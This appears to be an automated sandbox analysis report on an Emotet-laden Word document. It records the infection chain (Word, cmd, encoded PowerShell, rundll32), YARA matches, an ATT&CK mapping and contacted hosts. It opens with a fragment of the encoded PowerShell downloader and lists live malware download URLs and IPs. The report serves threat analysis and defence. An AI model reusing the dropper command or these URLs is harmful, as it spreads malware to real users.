ACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004C5A cpuid
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2111056339.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2115843341.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2123134959.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2109532201.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2113145679.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2120152287.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2116824052.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2114433259.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2352632908.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.6c0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.4b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.7d0000.1.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScripting32Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting32Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCommand and Scripting Interpreter211Network Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaPowerShell3Rc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 336494 Sample: DATA-480841.doc Startdate: 06/01/2021 Architecture: WINDOWS Score: 100 55 Antivirus detection for URL or domain 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->59 61 12 other signatures 2->61 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 25 2->17         started        process3 signatures4 75 Suspicious powershell command line found 14->75 77 Very long command line found 14->77 79 Encrypted powershell cmdline option found 14->79 81 PowerShell case anomaly found 14->81 19 powershell.exe 12 9 14->19         started        22 msg.exe 14->22         started        process5 dnsIp6 47 khanhhoahomnay.net 210.86.239.69, 49168, 80 NETNAM-AS-APNetnamCompanyVN Viet Nam 19->47 49 veterinariadrpopui.com 209.59.139.39, 49167, 80 LIQUIDWEBUS United States 19->49 51 3 other IPs or domains 19->51 24 rundll32.exe 19->24         started        process7 process8 26 rundll32.exe 15 24->26         started        signatures9 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->69 29 rundll32.exe 5 26->29         started        process10 signatures11 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->73 32 rundll32.exe 5 29->32         started        process12 signatures13 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->53 35 rundll32.exe 5 32->35         started        process14 signatures15 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->63 38 rundll32.exe 5 35->38         started        process16 signatures17 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->65 41 rundll32.exe 5 38->41         started        process18 signatures19 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->67 44 rundll32.exe 5 41->44         started        process20 signatures21 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->71

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    DATA-480841.doc60%VirustotalBrowse

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    7.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    9.2.rundll32.exe.6c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    10.2.rundll32.exe.1d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    11.2.rundll32.exe.4b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    13.2.rundll32.exe.260000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    8.2.rundll32.exe.2a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    15.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    14.2.rundll32.exe.6b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    12.2.rundll32.exe.7d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                    Domains

                    SourceDetectionScannerLabelLink
                    veterinariadrpopui.com4%VirustotalBrowse
                    wpsapk.com1%VirustotalBrowse
                    sofsuite.com4%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://veterinariadrpopui.com0%Avira URL Cloudsafe
                    http://veterinariadrpopui.com/content/5f18Q/100%Avira URL Cloudmalware
                    http://sofsuite.com/wp-includes/2jm3nIk/0%Avira URL Cloudsafe
                    http://khanhhoahomnay.net/wordpress/CGMC/100%Avira URL Cloudmalware
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/0%Avira URL Cloudsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://shop.elemenslide.com0%Avira URL Cloudsafe
                    http://khanhhoahomnay.net0%Avira URL Cloudsafe
                    http://shop.elemenslide.com/wp-content/n/100%Avira URL Cloudmalware
                    http://sofsuite.com0%Avira URL Cloudsafe
                    http://wpsapk.com0%Avira URL Cloudsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    http://wpsapk.com/wp-admin/v/0%Avira URL Cloudsafe
                    http://5.2.136.90/6tycsc/0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    veterinariadrpopui.com
                    		209.59.139.39
                    		truetrueunknown
                    wpsapk.com
                    		104.18.61.59
                    		truetrueunknown
                    sofsuite.com
                    		104.27.145.251
                    		truetrueunknown
                    khanhhoahomnay.net
                    		210.86.239.69
                    		truetrue
                      		unknown
                      shop.elemenslide.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://veterinariadrpopui.com/content/5f18Q/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://sofsuite.com/wp-includes/2jm3nIk/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://khanhhoahomnay.net/wordpress/CGMC/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://wpsapk.com/wp-admin/v/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://5.2.136.90/6tycsc/true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2112048540.0000000001E20000.00000002.00000001.sdmpfalse
                          		high
                          http://veterinariadrpopui.compowershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://investor.msn.comrundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpfalse
                              		high
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpfalse
                                		high
                                https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000005.00000002.2117636868.0000000003B18000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmpfalse
                                  		high
                                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2109113846.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113596822.0000000002B00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115556900.0000000002900000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmpfalse
                                        		high
                                        http://shop.elemenslide.compowershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://khanhhoahomnay.netpowershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://shop.elemenslide.com/wp-content/n/powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://investor.msn.com/rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpfalse
                                          		high
                                          http://sofsuite.compowershell.exe, 00000005.00000002.2117671209.0000000003B34000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://wpsapk.compowershell.exe, 00000005.00000002.2117636868.0000000003B18000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmpfalse
                                            		high
                                            http://www.%s.comPApowershell.exe, 00000005.00000002.2109113846.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113596822.0000000002B00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115556900.0000000002900000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		low

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.27.145.251
                                            		unknownUnited States
                                            		13335CLOUDFLARENETUStrue
                                            210.86.239.69
                                            		unknownViet Nam
                                            		24173NETNAM-AS-APNetnamCompanyVNtrue
                                            209.59.139.39
                                            		unknownUnited States
                                            		32244LIQUIDWEBUStrue
                                            104.18.61.59
                                            		unknownUnited States
                                            		13335CLOUDFLARENETUStrue
                                            5.2.136.90
                                            		unknownRomania
                                            		8708RCS-RDS73-75DrStaicoviciROtrue

                                            General Information

                                            Joe Sandbox Version:31.0.0 Red Diamond
                                            Analysis ID:336494
                                            Start date:06.01.2021
                                            Start time:08:44:11
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 33s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:DATA-480841.doc
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:17
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • GSI enabled (VBA)
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winDOC@26/8@7/5
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 91.5% (good quality ratio 88%)
                                            • Quality average: 75.5%
                                            • Quality standard deviation: 25.7%
                                            HCA Information:
                                            • Successful, ratio: 92%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .doc
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Found warning dialog
                                            • Click Ok
                                            • Attach to Office via COM
                                            • Scroll down
                                            • Close Viewer
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                            • TCP Packets have been reduced to 100
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            08:44:43API Interceptor1x Sleep call for process: msg.exe modified
                                            08:44:44API Interceptor57x Sleep call for process: powershell.exe modified
                                            08:44:50API Interceptor895x Sleep call for process: rundll32.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            104.27.145.251pack-91089 416755919.docGet hashmaliciousBrowse
                                            • sofsuite.com/wp-includes/2jm3nIk/
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • sofsuite.com/wp-includes/2jm3nIk/
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • sofsuite.com/wp-includes/2jm3nIk/
                                            210.86.239.69Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • khanhhoahomnay.net/wordpress/CGMC/
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • khanhhoahomnay.net/wordpress/CGMC/
                                            209.59.139.39Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            Adjunto.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            NQN0244_012021.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            Scan-0767672.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            info_39534.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            http://btxtfnereq4mf3x3q1eq1sdudvhhiurr.www4.meGet hashmaliciousBrowse
                                            • cirugiaesteticamexico.medicainspira.com/wordpress/wp-content/upgrade/i/googlephotos/album/
                                            104.18.61.59Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • wpsapk.com/wp-admin/v/
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • wpsapk.com/wp-admin/v/
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • wpsapk.com/wp-admin/v/
                                            5.2.136.90Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/
                                            Adjunto.docGet hashmaliciousBrowse
                                            • 5.2.136.90/nmjn7tw17/z6mjkdfb6xb/85tf0qh6u/bqo6i0tmr9bo/
                                            arc-NZY886292.docGet hashmaliciousBrowse
                                            • 5.2.136.90/zpm1364ks766bq5tfgm/of4c87wiptl9gmt2iai/xi3tkrikfkjmyw07j7s/8758g9rolh/96kjwl7hgnpltacdm2/gdi8d56ispt49sa36ql/
                                            NQN0244_012021.docGet hashmaliciousBrowse
                                            • 5.2.136.90/xgyqftp8/ypox5kzx24gfln5utkh/ejrffzc54r5vq/itkmc/prx4/
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • 5.2.136.90/tqndp5p5qacps4njp6/p6z0bktcdw7ja/i1rph/
                                            Scan-0767672.docGet hashmaliciousBrowse
                                            • 5.2.136.90/7hs0yieqcvglex40v9/th111ygicc1htiecx/eto0vvprampeftpmcc/
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • 5.2.136.90/n5z35/rncfyghpt3nn9/twyyh8xn/dm5hb/
